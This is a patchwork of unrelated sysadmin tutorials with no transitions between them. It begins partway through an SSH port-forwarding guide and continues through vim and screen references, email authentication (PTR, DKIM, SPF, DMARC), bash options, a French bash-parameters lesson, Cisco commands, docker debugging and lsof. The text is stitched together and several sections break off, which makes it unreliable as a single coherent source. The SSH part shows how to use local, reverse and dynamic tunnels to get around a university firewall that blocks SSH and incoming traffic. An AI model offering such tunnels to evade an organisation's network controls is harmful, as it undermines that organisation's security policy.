Now the SSH client at ‘work’ will connect to SSH server running at ‘home’ (usually running at port 22) binding port 9001 of ‘work’ to listen for local requests thus creating a SSH tunnel between ‘home’ and ‘work’. At the ‘home’ end it will create a connection to ‘yahoo.com’ at port 80. So ‘work’ doesn’t need to know how to connect to yahoo.com. Only ‘home’ needs to worry about that. The channel between ‘work’ and ‘home’ will be encrypted while the connection between ‘home’ and ‘yahoo.com’ will be unencrypted.
Now it is possible to browse yahoo.com by visiting http://localhost:9001 in the web browser at the 'work' computer. The 'home' computer will act as a gateway which accepts requests from the 'work' machine, fetches the data and tunnels it back. The full command used here follows the syntax shown above.
Here the ‘host’ to ‘yahoo.com’ connection is only made when browser makes the request not at the tunnel setup time.
It is also possible to specify a port in the ‘home’ computer itself instead of connecting to an external host. This is useful if I were to set up a VNC session between ‘work’ and ‘home’. Then the command line would be as follows.
ssh -L 5900:localhost:5900 home (Executed from 'work')
So here, what does localhost refer to? Is it 'work', since the command line is executed from 'work'? It turns out that it is not. As explained earlier, it is relative to the gateway ('home' in this case), not the machine from where the tunnel is initiated. So this will make a connection to port 5900 of the 'home' computer, where the VNC server would be listening.
The created tunnel can be used to transfer all kinds of data, not limited to web browsing sessions. We can also tunnel SSH sessions this way. Let's assume there is another computer ('banned') to which we need to SSH from within the university, but SSH access is being blocked. It is possible to tunnel an SSH session to this host using a local port forward. The setup would look like this.
As can be seen now the transferred data between ‘work’ and ‘banned’ are encrypted end to end. For this we need to create a local port forward as follows.
ssh -L 9001:banned:22 home
Now we need to create a SSH session to local port 9001 from where the session will get tunneled to ‘banned’ via ‘home’ computer.
ssh -p 9001 localhost
With that let’s move on to next type of SSH tunnelling method, reverse tunnelling.
Reverse Tunnelling with remote port forwarding
Let’s say it is required to connect to an internal university website from home. The university firewall is blocking all incoming traffic. How can we connect from ‘home’ to internal network so that we can browse the internal site? A VPN setup is a good candidate here. However for this example let’s assume we don’t have this facility. Enter SSH reverse tunnelling..
As in the earlier case we will initiate the tunnel from the 'work' computer behind the firewall. This is possible since only incoming traffic is blocked and outgoing traffic is allowed. However, instead of the earlier case, the client will now be at the 'home' computer. Instead of the -L option we now use -R, which specifies that a reverse tunnel needs to be created.
ssh -R 9001:intra-site.com:80 home (Executed from 'work')
Once executed the SSH client at ‘work’ will connect to SSH server running at home creating a SSH channel. Then the server will bind port 9001 on ‘home’ machine to listen for incoming requests which would subsequently be routed through the created SSH channel between ‘home’ and ‘work’. Now it’s possible to browse the internal site
by visiting http://localhost:9001 in ‘home’ web browser. The ‘work’ will then create a connection to intra-site and relay back the response to ‘home’ via the created SSH channel.
As nice as all of this is, you still need to create another tunnel for each additional site you want to reach, in both cases. Wouldn't it be nice if it were possible to proxy traffic to any site using the SSH channel created? That's what dynamic port forwarding is all about.
Dynamic Port Forwarding
Dynamic port forwarding allows you to configure one local port for tunnelling data to all remote destinations. However, to utilize this, the client application connecting to the local port should send its traffic using the SOCKS protocol. At the client side of the tunnel a SOCKS proxy is created, and the application (e.g. the browser) uses the SOCKS protocol to specify where the traffic should be sent when it leaves the other end of the ssh tunnel.
ssh -D 9001 home (Executed from 'work')
Here SSH will create a SOCKS proxy listening in for connections at local port 9001 and upon receiving a request would route the traffic via SSH channel created between ‘work’ and ‘home’. For this it is required to configure the browser to point to the SOCKS proxy at port 9001 at localhost.
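If you want to test the SOCKS proxy from the command line rather than the browser, curl can use it directly (the URL is just a placeholder):
curl --socks5-hostname localhost:9001 http://intra-site.com/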
This is a linux command line reference for common operations.
Examples marked with • are valid/safe to paste without modification into a terminal, so you may want to keep a terminal window open while reading this so you can cut & paste.
Command
Description
•
apropos whatis
Show commands pertinent to string. See also threadsafe
modes
Insert
enter insert mode
so you can start typing. Alternatively one can use i or a.
Esc
leave insert mode
so you can issue commands. Note in VIM the cursor keys & {Home, End, Page{up,down}} and Delete and Backspace work as expected in any mode, so you don't need to go back to command mode nearly as much as the original vi. Note even Ctrl+{left,right} jumps words like most other editors. Note also Ctrl+[ and Ctrl+c are equivalent to Esc and may be easier to type. Also Ctrl+o in insert mode will switch to normal mode for one command only and automatically switch back.
:command
runs named command
:help word
shows help on word
Typing Ctrl+d after word shows all entries containing word
:echo &word
shows value of option word
windows
:e
set buffer for current window
you can optionally specify a new file or existing buffer number (#3 for e.g.). Note if you specify a directory a file browser is started. E.g. :e . will start the browser in the current directory (which can be changed with the :cd command).
:sp
new window above
ditto
:vs
new window to left
ditto
:q
close current window
:qa
close all windows
add trailing ! to force
Ctrl+w {left,right,up,down}
move to window
Ctrl+w Ctrl+w
toggle window focus
Ctrl+w =
autosize windows
to new terminal size for e.g.
:ba
new window for all buffers
":vert ba" tiles windows vertically
buffers
:ls
list buffers
gf
open file under cursor
:bd
delete buffer
and any associated windows
:w
save file
Note :up[date] only writes file if changes made, but it's more awkward to type
:sav filename
save file as filename
Note :w filename doesn't switch to new file. Subsequent edits/saves happen to existing file
undo/redo
u
undo
Ctrl+r
redo
.
repeat
navigation
gg
Goto start of file
G
Goto end of file
:54
Goto line 54
80|
Goto column 80
Ctrl+g
Show file info
including your position in the file
ga
Show character info
g8 shows UTF8 encoding
Ctrl+e
scroll up
Ctrl+x needed first for insert mode
Ctrl+y
scroll down
Ctrl+x needed first for insert mode
zt
scroll current line to top of window
w
Goto next word
Note Ctrl+{right} in newer vims (which work also in insert mode)
b
Goto previous word
Note Ctrl+{left} in newer vims
[{
Goto previous { of current scope
%
Goto matching #if #else,{},(),[],/* */
must be one on line
zi
toggle folds on/off
bookmarks
m {a-z}
mark position as {a-z}
E.g. m a
' {a-z}
move to position {a-z}
E.g. ' a
' '
move to previous position
'0
open previous file
handy after starting vim
selection/whitespace
v
select visually
use cursor keys, home, end etc.
Shift+v
line select
CTRL+v = column select
Delete
cut selection
"_x
delete selection
without updating the clipboard or yank buffer. I remap x to this in my .vimrc
y
copy selection
p
paste (after cursor)
P is paste before cursor
"Ay
append selected lines to register a
use lowercase a to initialise register
"ap
paste contents of a
gq
reformat selection
justifies text and is useful with :set textwidth=70 (80 is default)
:s/1/2/
search for regexp 1 and replace with 2 in (visual) selection
programming
K
lookup word under cursor in man pages
2K means lookup in section 2
:make
run make in current directory
Ctrl+]
jump to tag
Ctrl+t to jump back levels. I map these to Alt+⇦⇨ in my .vimrc
vim -t name
Start editing where name is defined
Ctrl+{n,p}
scroll forward,back through autocompletions for word before cursor
uses words in current file (and included files) by default. You can change to a dictionary for e.g: set complete=k/usr/share/dicts/words Note only works in insert mode
Ctrl+x Ctrl+o
scroll through language specific completions for text before cursor
"Intellisense" for vim (7 & later). :help compl-omni for more info. Useful for python, css, javascript, ctags, ... Note only works in insert mode
screen is a much under-utilised program, which provides the following functionality:
Remote terminal session management (detaching or sharing terminal sessions)
unlimited windows (unlike the hardcoded number of Linux virtual consoles)
scrollback buffer (not limited to video memory like Linux virtual consoles)
copy/paste between windows
notification of either activity or inactivity in a window
split terminal (horizontally and vertically) into multiple regions
locking other users out of terminal
See also the tmux alternative
See also the byobu screen config manager.
See also reptyr as another way to reattach programs to a terminal.
Note for nested screen sessions, use "Ctrl+a a" to send commands to the inner screen,
and the standard "Ctrl+a" to send commands to the outer screen.
Key
Action
Notes
Ctrl+a c
new window
Ctrl+a n
next window
I bind F12 to this
Ctrl+a p
previous window
I bind F11 to this
Ctrl+a "
select window from list
I have window list in the status line
Ctrl+a Ctrl+a
previous window viewed
Ctrl+a S
split terminal horizontally into regions
Ctrl+a c to create new window there
Ctrl+a |
split terminal vertically into regions
Requires screen >= 4.1
Ctrl+a :resize
resize region
Ctrl+a :fit
fit screen size to new terminal size
Ctrl+a F is the same. Do after resizing xterm
Ctrl+a :remove
remove region
Ctrl+a X is the same
Ctrl+a tab
Move to next region
Ctrl+a d
detach screen from terminal
Start screen with -r option to reattach
Ctrl+a A
set window title
Ctrl+a x
lock session
Enter user password to unlock
Ctrl+a [
enter scrollback/copy mode
Enter to start and end copy region. Ctrl+a ] to leave this mode
Email is the cockroach of communication mediums: you just can't kill it. Email is the one method of online contact that almost everyone -- at least for that subset of "everyone" which includes people who can bear to touch a computer at all -- is guaranteed to have, and use.
So, reluctantly, we come to the issue of sending email through code. It's easy! Let's send some email through oh, I don't know, let's say ... Ruby, courtesy of some sample code I found while browsing the Ruby tag on Stack Overflow.
require 'net/smtp'
def send_email(to, subject = "", body = "")
from = "my@email.com"
body= "From: #{from}\r\nTo: #{to}\r\nSubject: #{subject}\r\n\r\n#{body}\r\n"
Net::SMTP.start('192.168.10.213', 25, '192.168.0.218') do |smtp|
smtp.send_message body, from, to
end
end
send_email "my@email.com", "test", "blah blah blah"
There's a bug in this code, though. Do you see it?
Just because you send an email doesn't mean it will arrive. Not by a long shot. Bear in mind this is email we're talking about. It was never designed to survive a bitter onslaught of criminals and spam, not to mention the explosive, exponential growth it has seen over the last twenty years. Email is a well that has been truly and thoroughly poisoned -- the digital equivalent of a superfund cleanup site. The ecosystem around email is a dank miasma of half-implemented, incompletely supported anti-spam hacks and workarounds.
Which means the odds of that random email your code just sent getting to its specific destination is .. spotty. At best.
If you want email your code sends to actually arrive in someone's AOL mailbox, to the dulcet tones of "You've Got Mail!", there are a few things you must do first. And most of them are only peripherally related to writing code.
1. Make sure the computer sending the email has a Reverse PTR record
What's a reverse PTR record? It's something your ISP has to configure for you -- a way of verifying that the email you send from a particular IP address actually belongs to the domain it is purportedly from.
Not every IP address has a corresponding PTR record. In fact, if you took a random sampling of addresses your firewall blocked because they were up to no good, you'd probably find most have no PTR record - a dig -x gets you no information. That's also apt to be true for mail spammers, or their PTR doesn't match up: if you do a dig -x on their IP you get a result, but if you look up that result you might not get the same IP you started with.
That's why PTR records have become important. Originally, PTR records were just intended as a convenience, and perhaps as a way to be neat and complete. There still are no requirements that you have a PTR record or that it be accurate, but because of the abuse of the internet by spammers, certain conventions have grown up. For example, you may not be able to send email to some sites if you don't have a valid PTR record, or if your pointer is "generic".
How do you get a PTR record? You might think that this is done by your domain registrar - after all, they point your domain to an IP address. Or you might think whoever handles your DNS would do this. But the PTR record isn't up to them, it's up to the ISP that "owns" the IP block it came from. They are the ones who need to create the PTR record.
A reverse PTR record is critical. How critical? Don't even bother reading any further until you've verified that your ISP has correctly configured the reverse PTR record for the server that will be sending email. It is absolutely the most common check done by mail servers these days. Fail the reverse PTR check, and I guarantee that a huge percentage of the emails you send will end up in the great bit bucket in the sky -- and not in the email inboxes you intended.
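A quick way to check a PTR record yourself is with dig (the IP and hostname below are placeholders; use your own mail server's values):
dig -x 203.0.113.10 +short      # should return your mail server's hostname
dig +short mail.example.com     # should resolve back to the same IP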
2. Configure DomainKeys Identified Mail in your DNS and code
What's DomainKeys Identified Mail? With DKIM, you "sign" every email you send with your private key, a key only you could possibly know. And this can be verified by attempting to decrypt the email using the public key stored in your public DNS records. It's really quite clever!
The first thing you need to do is generate some public-private key pairs (one for every domain you want to send email from) via OpenSSL. I used a win32 version I found. Issue these commands to produce the keys in the below files:
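The exact commands aren't reproduced here, but with OpenSSL a key pair is typically generated along these lines (file names are illustrative):
openssl genrsa -out dkim.private.pem 1024
openssl rsa -in dkim.private.pem -pubout -out dkim.public.pem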
These public and private keys are just big ol' Base64 encoded strings, so plop them in your code as configuration string resources that you can retrieve later.
Next, add some DNS records. You'll need two new TXT records.
_domainkey.example.com
"o=~; r=contact@example.com"
selector._domainkey.example.com
"k=rsa; p={public-key-base64-string-here}"
The first TXT DNS record is the global DomainKeys policy and contact email.
The second TXT DNS record is the public base64 key you generated earlier, as one giant unbroken string. Note that the "selector" part of this record can be anything you want; it's basically just a disambiguating string.
Almost done. One last thing -- we need to sign our emails before sending them. In any rational world this would be handled by an email library of some kind. We use Mailbee.NET which makes this fairly painless:
To be honest, SenderID is a bit of a "nice to have" compared to the above two. But if you've gone this far, you might as well go the distance. SenderID, while a little antiquated and kind of.. Microsoft/Hotmail centric.. doesn't take much additional effort.
SenderID isn't complicated. It's another TXT DNS record at the root of, say, example.com, which contains a specially formatted string documenting all the allowed IP addresses that mail can be expected to come from. Here's an example:
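The original example isn't reproduced here; a hypothetical record in this style, published as a TXT record at the root of example.com, might look like this (the IP is a placeholder):
example.com.  IN  TXT  "v=spf1 a mx ip4:203.0.113.10 ~all"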
That sucked. How do I know all this junk is working?
I agree, it sucked. Email sucks; what did you expect? I used two methods to verify that all the above was working:
Test emails sent to a GMail account.
Use the "show original" menu on the arriving email to see the raw message content as seen by the email server. You want to verify that the headers definitely contain the following:
If you see that, then the Reverse PTR and DKIM signing you set up is working. Google provides excellent diagnostic feedback in their email server headers, so if something isn't working, you can usually discover enough of a hint there to figure out why.
Test emails sent to the Port25 email verifier
Port25 offers a really nifty public service -- you can send email to check-auth@verifier.port25.com and it will reply to the from: address with an extensive diagnostic! Here's an example summary result from a test email I just sent to it:
You want to pass SPF, DKIM, and Sender-ID. Don't worry about the DomainKeys failure, as I believe it is spurious -- DKIM is the "newer" version of that same protocol.
If you’re an email marketer, you’ve probably heard acronyms like “SPF,” “DKIM,” and “DMARC” being tossed around with little explanation. People might assume you automatically understand these terms, but the truth is that many marketers’ grasp of these concepts is vague, at best.
The good news is that SPF, DKIM, and DMARC can work together for you like a triple rainbow of email authentication, and that’s why we want you to have a thorough understanding of them. The explanations are technical, but these are three fundamental concepts to understand about email authentication.
We’ll provide you with a brief and insightful look at each of these protocols, then you’ll be able to start tossing these acronyms around like the pros. First things first…
What is email authentication, and why is it so important?
Email authentication helps to improve the delivery and credibility of your marketing emails by implementing protocols that verify your domain as the sender of your messages.
Using authentication won’t guarantee that your mail reaches the inbox but it preserves your brand reputation while making sure you have the best possible chance of having your messages reach their intended destination.
Read on to find out how to ensure you’re achieving the gold standard of email authentication.
SPF, DKIM, and DMARC: 3 Technical, but Essential, Explanations
SPF: Sender Policy Framework
SPF, Sender Policy Framework, is a way for recipients to confirm the identity of the sender of an incoming email.
By creating an SPF record, you can designate which mail servers are authorized to send mail on your behalf. This is especially useful if you have a hosted email solution (Office365, Google Apps, etc.) or if you use an ESP like Higher Logic.
Here’s a brief synopsis of the process:
The sender adds a record to the DNS settings.
The record is for the domain used in their FROM: address (e.g. if I send from contact@sysa.tech, add the record to sysa.tech). This record includes all IP addresses (mail servers) that are authorized to send mail on behalf of this domain. A typical SPF record will look something like this: v=spf1 ip4:64.34.187.182 ip4:66.70.82.40 ip4:64.27.72.0/24 include:magnetmail.net ~all
The receiving server checks the DNS records.
When the mail is sent, the receiving server checks the DNS records for the domain in the FROM: field. If the IP address is listed in that record (as seen above), the message passes SPF.
If SPF exists, but the IP address isn't in the record, it's a hard fail.
If the SPF record exists, but the IP address of the sending mail server isn’t in the record, it’s considered a “hard-fail.” This can often cause mail to be rejected or routed to the spam folder.
If no SPF record exists, it's a soft fail.
If no SPF record exists at all, this is considered a “soft-fail.” These are most likely to cause messages to be routed to spam but can lead to a message being rejected as well.
DKIM: DomainKeys Identified Mail
DKIM, short for DomainKeys Identified Mail, also allows for the identification of “spoofed” emails but using a slightly different process. Instead of a single DNS record that keys off the FROM: address, DKIM employs two encryption keys: one public and one private.
The private key is housed in a secure location that can only be accessed by the owner of the domain. This private key is used to create an encrypted signature that is added to every message sent from that domain. Using the signature, the receiver of the message can check against the public DKIM key, which is stored in a public-facing DNS record. If the records “match,” the mail could only have been sent by the person with access to the private key, aka the domain owner.
DMARC: Domain-based Message Authentication, Reporting & Conformance
While SPF and DKIM can be used as stand-alone methods, DMARC must rely on either SPF or DKIM to provide the authentication.
DMARC (Domain-based Message Authentication, Reporting, & Conformance) builds on those technologies by providing directions to the receiver on what to do if a message from your domain is not properly authenticated.
Like SPF and DKIM, DMARC also requires a specific DNS record to be entered for the domain you wish to use in your FROM: address. This record can include several values, but only two are required:
(v) tells the receiving server to check DMARC
(p) gives instructions on what to do if authentication fails.
The values for p can include:
p=none, which tells the receiving server to take no specific action if authentication fails.
p=quarantine, which tells the receiving server to treat unauthenticated mail suspiciously. This could mean routing the mail to spam/junk, or adding a flag indicating the mail is not trusted.
p=reject, which tells the receiving server to reject any mail that does not pass SPF and/or DKIM authentication.
In addition to the required tags advising how to handle unauthenticated mail, DMARC also provides a reporting component that can be very useful for most organizations. By enabling the reporting features of DMARC, your organization can receive reports indicating all mail that is being sent with your domain in the FROM: address. This can help identify spoofed or falsified mail patterns as well as tracking down other business divisions or partners that may be legitimately sending mail on your behalf without authentication.
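A typical DMARC record, published as a TXT record at _dmarc.<your domain>, might look like this (the reporting address is illustrative):
v=DMARC1; p=quarantine; rua=mailto:dmarc-reports@sysa.tech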
allexport off
braceexpand on
emacs on
errexit off
errtrace off
functrace off
hashall on
histexpand on
history on
ignoreeof off
interactive-comments on
keyword off
monitor on
noclobber off
noexec off
noglob off
nolog off
notify off
nounset off
onecmd off
physical off
pipefail off
posix off
privileged off
verbose off
vi off
xtrace off
See set command for detailed explanation of each variable.
How do I set and unset shell variable options?
To set shell variable option use the following syntax:
set -o variableName
To unset shell variable option use the following syntax:
set +o variableName
Examples
Disable <CTRL-d> which is used to logout of a login shell (local or remote login session over ssh).
set -o ignoreeof
Now, try pressing [CTRL-d]
Sample outputs:
Use "exit" to leave the shell.
Turn it off, enter:
set +o ignoreeof
shopt command
You can turn on or off the values of variables controlling optional behavior using the shopt command. To view a list of the currently configured options and their states, enter either of the following:
shopt
shopt -p
Sample outputs:
cdable_vars off
cdspell off
checkhash off
checkwinsize on
cmdhist on
compat31 off
dotglob off
execfail off
expand_aliases on
extdebug off
extglob off
extquote on
failglob off
force_fignore on
gnu_errfmt off
histappend off
histreedit off
histverify off
hostcomplete on
huponexit off
interactive_comments on
lithist off
login_shell off
mailwarn off
no_empty_cmd_completion off
nocaseglob off
nocasematch off
nullglob off
progcomp on
promptvars on
restricted_shell off
shift_verbose off
sourcepath on
xpg_echo off
How do I enable (set) and disable (unset) each option?
To enable (set) each option, enter:
shopt -s optionName
To disable (unset) each option, enter:
shopt -u optionName
Examples
If the cdspell option is set, minor errors in the spelling of a directory name in a cd command will be corrected. The errors checked for are transposed characters, a missing character, and one character too many. If a correction is found, the corrected name is printed and the command proceeds. For example, type the following command (note the spelling of the /etc directory):
cd /etcc
Sample outputs:
bash: cd: /etcc: No such file or directory
Now, turn on cdspell option and try again the same cd command, enter:
shopt -s cdspell
cd /etcc
Sample outputs:
/etc
[vivek@vivek-desktop /etc]$
Customizing Bash environment with shopt and set
Edit your ~/.bashrc, enter:
vi ~/.bashrc
Add the following commands:
# Correct dir spellings
shopt -q -s cdspell
# Make sure the display gets updated when the terminal window gets resized
shopt -q -s checkwinsize
# Turn on the extended pattern matching features
shopt -q -s extglob
# Append rather than overwrite history on exit
shopt -s histappend
# Save multi-line commands in history as single entries
shopt -q -s cmdhist
# Get immediate notification of background job termination
set -o notify
# Disable [CTRL-D] which is used to exit the shell
set -o ignoreeof
Le 1er paramètre est : 1 Le 3ème paramètre est : 3 Le 10ème paramètre est : 10 Le 15ème paramètre est : 15
or alternatively:
./affiche_param.sh un 2 trois 4 5 6 7 8 9 dix 11 12 13 14 quinze 16 17 Le 1er paramètre est : un Le 3ème paramètre est : trois Le 10ème paramètre est : dix Le 15ème paramètre est : quinze
If some parameters contain special characters or spaces, they must then be quoted:
./affiche_param.sh un 2 "le 3ème" 4 5 6 7 8 9 dix 11 12 13 14 "le 15ème" 16 17 Le 1er paramètre est : un Le 3ème paramètre est : le 3ème Le 10ème paramètre est : dix Le 15ème paramètre est : le 15ème
Special parameters
These are also reserved variables; some of them make it possible to operate on the parameters themselves.
These parameters are the following:
$0
Contains the name of the script as it was invoked
$*
All the parameters, in the form of a single argument
$@
All the arguments, one argument per parameter
$#
The number of parameters passed to the script
$?
The return code of the last command
$$
The PID of the shell executing the script
$!
The PID of the last process started in the background
Example 2
Here is another small script that uses all of the special parameters described above.
#!/bin/bash
# affiche_param_2.sh
# Display the script name
echo "Le nom de mon script est : $0"
# Display the number of parameters
echo "Vous avez passé $# paramètres"
# List of parameters (as a single argument)
for param in "$*"
do
echo "Voici la liste des paramètres (un seul argument) : $param"
done
# List of parameters (one parameter per argument)
echo "Voici la liste des paramètres (un paramètre par argument) :"
for param in "$@"
do
echo -e "\tParamètre : $param"
done
# Display the PID of the shell running the script
echo "Le PID du shell qui exécute le script est : $$"
# Run a command in the background
sleep 100 &
# Display the PID of the process started in the background
echo "Le PID de la dernière commande exécutée en arrière-plan est : $!"
# Display the return code of the last "echo" command
echo "Le code retour de la commande précédente est : $?"
# Generate an error
echo "Génération d'une erreur..."
# Show the bad command
echo "ls /etc/password 2>/dev/null"
ls /etc/password 2>/dev/null
# Display the return code of the last command
echo "Le code retour de la commande précédente est : $?"
exit
Which gives, with the following invocation:
./affiche_param_2.sh 1 2 3 quatre 5 six
Le nom de mon script est : ./affiche_param_2.sh Vous avez passé 6 paramètres Voici la liste des paramètres (un seul argument) : 1 2 3 quatre 5 six Voici la liste des paramètres (un paramètre par argument) : Paramètre : 1 Paramètre : 2 Paramètre : 3 Paramètre : quatre Paramètre : 5 Paramètre : six Le PID du shell qui exécute le script est : 6165 Le PID de la dernière commande exécutée en arrière-plan est : 6166 Le code retour de la commande précédente est : 0 Génération d'une erreur... ls /etc/password 2>/dev/null Le code retour de la commande précédente est : 1
Initializing parameters
- The "set" command -
It is possible to assign parameters to the shell directly using the set command.
A simple command such as:
set param1 param2 param3
will automatically initialize the positional parameters $1, $2 and $3 with the values param1, param2 and param3, erasing any previous values they may have held. The special parameters $#, $* and $@ are updated accordingly.
Examples
$ set param1 param2 param3 $ echo "Nombre de paramètres : $#" Nombre de paramètres : 3 $ echo "Le second paramètre est : $2" Le second paramètre est : param2 $ echo "Les paramètres sont : $@" Les paramètres sont : param1 param2 param3
$ set pêche pomme $ echo "Nombre de paramètres : $#" Nombre de paramètres : 2 $ echo "Les paramètres sont : $@" Les paramètres sont : pêche pomme
This feature can prove useful when processing a file line by line, in order to isolate each word (field) and format the output, as in the sketch following the sample line below.
Login : jp Nom : Jean-Philippe ID : 500 Group : 500 Shell : /bin/bash
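A minimal sketch of how a line like the one above could be produced with set (field positions assume the standard /etc/passwd layout):
while read -r ligne; do
IFS=':'
set -- $ligne
IFS=' '
echo "Login : $1 Nom : $5 ID : $3 Group : $4 Shell : $7"
done < /etc/passwd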
- The "shift" command -
The shift builtin shifts the positional parameters: the value of the 1st parameter ($1) is replaced by the value of the 2nd ($2), that of the 2nd ($2) by the value of the 3rd ($3), and so on. An optional argument (shift [n]) indicates by how many positions the parameters should be shifted.
Example 3
Here is an illustration of the shift builtin in use.
#!/bin/bash
# decale_param.sh
echo
echo "Nombre de paramètres : $#"
echo "Le 1er paramètre est : $1"
echo "Le 3ème paramètre est : $3"
echo "Le 6ème paramètre est : $6"
echo "Le 10ème paramètre est : ${10}"
echo "============================================="
echo "Décalage d'un pas avec la commande \"shift\""
shift
echo "Nombre de paramètres : $#"
echo "Le 1er paramètre est : $1"
echo "Le 3ème paramètre est : $3"
echo "Le 6ème paramètre est : $6"
echo "Le 10ème paramètre est : ${10}"
echo "============================================="
echo "Décalage de quatre pas avec la commande \"shift 4\""
shift 4
echo "Nombre de paramètres : $#"
echo "Le 1er paramètre est : $1"
echo "Le 3ème paramètre est : $3"
echo "Le 6ème paramètre est : $6"
echo "Le 10ème paramètre est : ${10}"
echo
And its result:
./decale_param.sh 1 2 3 4 5 6 7 8 9 10
Nombre de paramètres : 10 Le 1er paramètre est : 1 Le 3ème paramètre est : 3 Le 6ème paramètre est : 6 Le 10ème paramètre est : 10 ============================================= Décalage d'un pas avec la commande "shift" Nombre de paramètres : 9 Le 1er paramètre est : 2 Le 3ème paramètre est : 4 Le 6ème paramètre est : 7 Le 10ème paramètre est : ============================================= Décalage de quatre pas avec la commande "shift 4" Nombre de paramètres : 5 Le 1er paramètre est : 6 Le 3ème paramètre est : 8 Le 6ème paramètre est : Le 10ème paramètre est :
This document, entitled « Bash - Les paramètres » and taken from CommentCaMarche (https://www.commentcamarche.net/), is made available under the terms of the Creative Commons license.
You may copy and modify copies of this page under the conditions set by the license, as long as this notice clearly appears.
Quick and dirty OpenSSH configlet here. If you have a set of hosts or devices that require you to first jump through a bastion host, the following will allow you to run a single ssh command:
Host *
ProxyCommand ssh -A <bastion_host> nc %h %p
Change the Host * line to best match the hostnames that require a bastion host.
Start with connecting : telnet switch ssh switch
To have admin privileges : ena
Look at the config : show run
See the log : show log
Sneak a peek at the power supply, fan and temps : show environment
Show the status of an interface : show int ... status
Go to configuration mode : conf t int ...
Copy the configuration ( running to persistent mem ) : wr
When you're a developer, your boss wants you to do things quickly even if it's buggy.
When you're a sysadmin, your boss wants you to do things right even if it's slow.
Sometimes things crash when they’re running inside a Docker container though, and then all of a sudden it can get much more difficult to work out why, or what the hell to do next.
If you’re stuck in that situation, here are my go-to debugging commands to help you get a bit more information on what’s up:
docker logs <container_id>
Hopefully you’ve already tried this, but if not, start here. This’ll give you the full STDOUT and STDERR from the command that was run initially in your container.
docker stats <container_id>
If you just need to keep an eye on the metrics of your container to work out what’s gone wrong, docker stats can help: it’ll give you a live stream of resource usage, so you can see just how much memory you’ve leaked so far.
docker cp <container_id>:/path/to/useful/file /local-path
Often just getting hold of more log files is enough to sort you out. If you already know what you want, docker cp has your back: copy any file from any container back onto your local machine, so you can examine it in depth (especially useful for analysing heap dumps).
docker exec -it <container_id> /bin/bash
Next up, if you can run the container (if it’s crashed, you can restart it with docker start <container_id>), shell in directly and start digging around for further details by hand.
docker commit <container_id> my-broken-container && docker run -it my-broken-container /bin/bash
Can’t start your container at all? If you’ve got an initial command or entrypoint that immediately crashes, Docker will immediately shut it back down for you. This can make your container unstartable, so you can’t shell in any more, which really gets in the way. Fortunately, there’s a workaround: save the current state of the shut-down container as a new image, and start that with a different command to avoid your existing failures. Have a failing entrypoint instead? There’s an entrypoint override command-line flag too.
lsof stands for List Open Files. It is easy to remember lsof command if you think of it as “ls + of”, where ls stands for list, and of stands for open files.
It is a command line utility used to list information about the files that are opened by various processes. In Unix, everything is a file (pipes, sockets, directories, devices, etc.), so by using lsof you can get information about any opened file.
1. Introduction to lsof
Simply typing lsof will provide a list of all open files belonging to all active processes.
By default, one file per line is displayed. Most of the columns are self-explanatory. We will explain the details of a couple of cryptic columns (FD and TYPE).
FD – Represents the file descriptor. Some of the values of FDs are,
cwd – Current Working Directory
txt – Text file
mem – Memory mapped file
mmap – Memory mapped device
NUMBER – Represents the actual file descriptor. The character after the number, e.g. ‘1u’, represents the mode in which the file is opened: r for read, w for write, u for read and write.
TYPE – Specifies the type of the file. Some of the values of TYPEs are,
REG – Regular File
DIR – Directory
FIFO – First In First Out
CHR – Character special file
For a complete list of FD & TYPE, refer man lsof.
2. List processes which opened a specific file
You can list only the processes which opened a specific file, by providing the filename as arguments.
# lsof /var/log/syslog
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
rsyslogd 488 syslog 1w REG 8,1 1151 268940 /var/log/syslog
3. List opened files under a directory
You can list the processes which opened files under a specified directory using the ‘+D’ option. +D will recurse into subdirectories as well. If you don’t want lsof to recurse, use the ‘+d’ option.
4. List opened files based on process names starting with
You can list the files opened by processes whose names start with a given string, using the ‘-c’ option. -c followed by the string lists the files opened by any process whose name starts with that string. You can give multiple -c switches on a single command line.
Sometimes when we try to umount a directory, the system reports a “Device or Resource Busy” error. So we need to find out which processes are using the mount point and kill them in order to umount the directory. Using lsof we can find those processes.
# lsof /home
The following will also work.
# lsof +D /home/
6. List files opened by a specific user
In order to find the list of files opened by a specific users, use ‘-u’ option.
# lsof -u lakshmanan
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
update-no 1892 lakshmanan 20r FIFO 0,8 0t0 14536 pipe
update-no 1892 lakshmanan 21w FIFO 0,8 0t0 14536 pipe
bash 1995 lakshmanan cwd DIR 8,1 4096 393218 /home/lakshmanan
Sometimes you may want to list files opened by all users except one or two. In that case you can use ‘^’ to exclude only those particular users, as follows:
# lsof -u ^lakshmanan
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
rtkit-dae 1380 rtkit 7u 0000 0,9 0 4360 anon_inode
udisks-da 1584 root cwd DIR 8,1 4096 2 /
The above command listed all the files opened by all users, except user ‘lakshmanan’.
7. List all open files by a specific process
You can list all the files opened by a specific process using ‘-p’ option. It will be helpful sometimes to get more information about a specific process.
# lsof -p 1753
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
bash 1753 lakshmanan cwd DIR 8,1 4096 393571 /home/lakshmanan/test.txt
bash 1753 lakshmanan rtd DIR 8,1 4096 2 /
bash 1753 lakshmanan 255u CHR 136,0 0t0 3 /dev/pts/0
...
8. Kill all processes that belong to a particular user
When you want to kill all the processes that have files opened by a specific user, you can use the ‘-t’ option to output only the process IDs and pass them to kill as follows:
# kill -9 `lsof -t -u lakshmanan`
The above command will kill all processes belonging to user ‘lakshmanan’ that have files open.
Similarly, you can use ‘-t’ in many ways. For example, listing the process IDs of processes that have /var/log/syslog open can be done with:
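# lsof -t /var/log/syslog
When you give several list options, lsof ORs them by default; for instance (user and process name reused from the earlier examples):
# lsof -u lakshmanan -c init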
This command uses two list options, ‘-u’ and ‘-c’, so it lists processes that belong to user ‘lakshmanan’ as well as processes whose name starts with ‘init’.
But when you want to list only the processes that belong to user ‘lakshmanan’ AND whose name starts with ‘init’, you can use the ‘-a’ option.
# lsof -u lakshmanan -c init -a
The above command will not output anything, because there is no such process named ‘init’ belonging to user ‘lakshmanan’.
10. Execute lsof in repeat mode
lsof also support Repeat mode. It will first list files based on the given parameters, and delay for specified seconds and again list files based on the given parameters. It can be interrupted by a signal.
Repeat mode can be enabled using ‘-r’ or ‘+r’. If ‘+r’ is used, repeat mode ends when no open files are found; ‘-r’ will continue to list, delay and list again until an interrupt is received, regardless of whether any files are open.
